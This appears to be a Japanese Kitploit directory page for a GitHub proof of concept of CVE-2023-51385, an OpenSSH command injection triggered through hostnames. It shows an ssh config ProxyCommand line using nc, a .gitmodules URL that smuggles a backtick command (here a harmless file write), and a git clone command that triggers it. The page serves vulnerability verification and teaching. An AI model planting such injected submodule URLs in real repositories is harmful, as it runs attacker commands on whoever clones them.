Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-51385_test — CVE-2023-51385 に対する検証 | Kitploit
ツール/GitHubGitHub/ltmthink/cve-2023-51385_test
脆弱性分析エクスプロイトウェブアプリケーション悪用サプライチェーンセキュリティ学習と教育
GitHubltmthink/cve-2023-51385_test

CVE-2023-51385_test

CVE-2023-51385 に対する検証

リポジトリを見る
7172年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-51385の検証

まず、~/.ssh/configに以下の内容を追加する必要があります

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

.gitmodulesファイルの記述にはコマンドインジェクションが存在します

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

設定が完了したら、以下のコマンドを実行してトリガーします

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

実行に成功すると、CVE-2023-51385_testディレクトリにcve.txtファイルが生成されます

image-20240317161540677

注意:OpenSSHは<9.6p1である必要があります

詳細情報はこちらのブログを参照してください:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

ツールをダウンロード